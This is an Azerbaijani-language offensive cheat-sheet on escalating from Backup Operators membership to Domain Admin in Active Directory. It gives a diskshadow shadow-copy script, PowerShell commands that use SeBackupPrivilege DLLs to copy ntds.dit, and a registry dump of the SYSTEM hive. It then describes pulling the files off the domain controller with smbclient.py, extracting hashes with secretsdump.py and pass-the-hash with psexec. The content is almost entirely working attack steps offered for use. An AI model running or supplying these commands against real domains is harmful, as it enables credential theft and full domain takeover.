Abusing Backup Operators Group

Əgər "Backup Operators Group"nun üzvü olan istifadəçi hesabını poza bilsək, onda biz onun SeBackupPrivilege-dən sui-istifadə edərək DC-nin cari vəziyyətinin kölgə nüsxəsini yarada, ntds.dit verilənlər bazası faylını çıxara, hashləri atıb və s. İmtiyazlarımızı DA-ya yüksəldin.

1. SeBackupPrivilege ilə hesaba giriş əldə etdikdən sonra biz DC-yə daxil ola və imzalanmış ikili 'diskshadow' istifadə edərək kölgə surətini yarada bilərik:

#shadow surəti prosesi skriptini ehtiva edən .txt faylı yaradın
Script ->{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% w:
end backup
}

#Skriptimizlə parametr olaraq 'diskshadow' icra edin
diskshadow /s script.txt

1. Sonra biz "kölgə" nüsxəsinə daxil olmalıyıq, bizdə SeBackupPrivilege ola bilər, lakin biz sadəcə olaraq ntds.dit-i kopyalayıb yapışdıra bilmərik, biz ehtiyat proqram təminatını təqlid etməliyik və onu əlçatan qovluğa köçürmək üçün Win32 API zənglərindən istifadə etməliyik. Bunun üçün bu heyrətamiz repodan istifadə edəcəyik:

#Powershell istifadə edərək hər iki dll faylının repodan idxalı
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll

#SeBackupPrivilege-in aktiv olub olmadığı yoxlanılır
Get-SeBackupPrivilege

#Əgər belə deyilsə, biz onu işə salırıq
Set-SeBackupPrivilege

# ntds.dit verilənlər bazası faylını kölgə nüsxəsindən seçdiyimiz yerə köçürmək üçün dll-lərin funksionallığından istifadə edin
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite

#Dump the SYSTEM hive
reg save HKLM\SYSTEM c:\temp\system.hive

1. Impacket və ya başqa alətdən smbclient.py istifadə edərək biz ntds.dit və SİSTEM hive yerli maşınımıza köçürürük.

2. İmpacketdən secretsdump.py istifadə edin və hashları alın.

3. PTH üçün psexec və ya seçdiyiniz başqa alətdən istifadə edin və Domain Admin girişi əldə edin.